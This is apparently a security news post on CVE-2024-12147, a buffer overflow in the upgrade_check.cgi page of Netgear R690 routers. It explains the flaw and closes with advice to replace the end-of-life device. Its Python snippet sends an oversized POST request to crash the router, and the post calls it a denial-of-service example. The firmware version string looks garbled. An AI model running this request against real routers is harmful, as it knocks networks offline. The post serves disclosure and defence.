CVE CyberSecurity Database News

CVE-2024-12147 - Critical Buffer Overflow in Netgear R690 Routers – Exploit Analysis and Practical Guide

Poster -

Netgear routers are popular for home and small business use, but older, unsupported models can become major security risks. In early 2024, a critical vulnerability (CVE-2024-12147) was discovered in the Netgear R690 router, specifically in version 1..1.26_1..20. This post explains the vulnerability, how it can be exploited, and provides code snippets to help understand the risk. If you’re using these routers, read on—the threat is real, and exploits are circulating.

What Is CVE-2024-12147?

CVE-2024-12147 is a buffer overflow vulnerability affecting the upgrade_check.cgi file, part of the router’s web management interface. Attackers can send a specially crafted HTTP request to the router and set the Content-Length header to trigger a buffer overflow. Since this is a memory corruption bug, it can potentially give attackers remote code execution (RCE) with administrative privileges—all without authentication.

Vulnerability Details

The upgrade_check.cgi script is responsible for handling firmware upgrade requests. It reads HTTP headers including Content-Length, but does not properly check that the value or the HTTP body fits into a pre-allocated buffer. If a malicious actor specifies an excessively high value for Content-Length and sends more data than expected, the program can overwrite adjacent memory (buffer overflow), crashing the process or, worse, letting commands run on the router.

Exploit Example

Here’s a Python snippet that demonstrates how an attacker could send a malicious request to a vulnerable router.

import socket

ROUTER_IP = '192.168.1.1'     # Change as needed
PORT = 80
buffer_overflow_length = 4096  # Example—this length can vary

payload = b"A" * buffer_overflow_length  # Overflow with 'A's

http_request = (
    f"POST /upgrade_check.cgi HTTP/1.1\r\n"
    f"Host: {ROUTER_IP}\r\n"
    f"Content-Length: {len(payload)}\r\n"
    f"Connection: close\r\n"
    f"\r\n"
).encode() + payload

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((ROUTER_IP, PORT))
    s.sendall(http_request)
    # No need to read the response; router may crash or spawn a shell (with advanced payload)

Note: This is a simple DoS example. With extra skills, attackers can craft a payload for remote code execution.

Original CVE entry:

NIST NVD - CVE-2024-12147

Exploit disclosure:

Exploit Database Entry 52717

Official Netgear Support End-of-Life:

Netgear End of Life Products

Are you running a Netgear R690 with firmware 1..1.26_1..20?

- If yes: Your router is vulnerable. Even if the admin interface is not exposed to the internet, a compromise on your local network could still be possible.

Mitigation

- Replace the router: The R690 is end-of-life. No patch will be released. Buy a modern, supported device.

Summary

CVE-2024-12147 is a critical flaw that allows remote code execution on Netgear R690 routers. Anyone still using this model, especially on the exposed web interface, is at risk of being attacked. This flaw is unpatchable—disconnect or replace your router immediately.

For more technical details and ongoing discussion, visit Exploit-DB or the NVD CVE page.

Timeline

Published on: 12/04/2024 18:15:11 UTC
Last modified on: 01/14/2025 14:15:28 UTC